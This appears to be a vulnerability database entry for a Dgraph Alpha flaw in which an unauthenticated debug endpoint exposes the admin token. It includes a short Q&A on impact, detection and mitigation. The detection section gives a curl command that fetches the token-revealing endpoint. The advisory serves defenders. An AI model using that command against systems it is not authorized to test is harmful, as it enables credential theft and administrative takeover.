CVE-2026-40173
Unauthenticated Credential Disclosure in Dgraph Alpha Enables Admin Access
Publication date: 2026-04-15
Last updated on: 2026-04-25
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dgraph | dgraph | to 25.3.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-215 | The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production. |
| CWE-200 | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
| CWE-522 | The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Dgraph versions 25.3.1 and earlier, where an unauthenticated endpoint (/debug/pprof/cmdline) exposes the full process command line, including the admin token configured at startup.
An attacker can access this endpoint without authentication, retrieve the admin token, and then use it to gain unauthorized privileged administrative access by bypassing token validation on admin-only endpoints.
How can this vulnerability impact me? :
The vulnerability allows an attacker to gain unauthorized privileged administrative access to the Dgraph database.
- They can perform configuration changes.
- They can execute operational control actions.
This can happen in any deployment where the Alpha HTTP port is accessible by untrusted parties, potentially compromising the integrity and availability of the database.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if the /debug/pprof/cmdline endpoint is accessible without authentication on the Dgraph Alpha HTTP port. Accessing this endpoint reveals the full process command line including the admin token configured via the --security "token=..." startup flag.
A practical approach is to send an HTTP request to the /debug/pprof/cmdline endpoint on the Dgraph Alpha HTTP port and observe if the response contains the admin token.
- Use curl to check the endpoint: curl http://<dgraph-alpha-host>:<port>/debug/pprof/cmdline
- If the response includes the admin token or command line arguments with the token, the vulnerability is present.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade Dgraph to version 25.3.2 or later, where this vulnerability has been fixed.
Until the upgrade can be performed, restrict access to the Alpha HTTP port to trusted parties only, preventing untrusted parties from reaching the vulnerable endpoint.
Additionally, consider firewall rules or network segmentation to limit exposure of the /debug/pprof/cmdline endpoint.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows an attacker to gain unauthorized privileged administrative access by retrieving an exposed admin token. Such unauthorized access can lead to unauthorized configuration changes and operational control, potentially resulting in unauthorized data access or modification.
While the CVE description does not explicitly mention compliance with standards like GDPR or HIPAA, unauthorized administrative access and potential data exposure or manipulation could lead to violations of these regulations, which require strict controls on access to sensitive data and system integrity.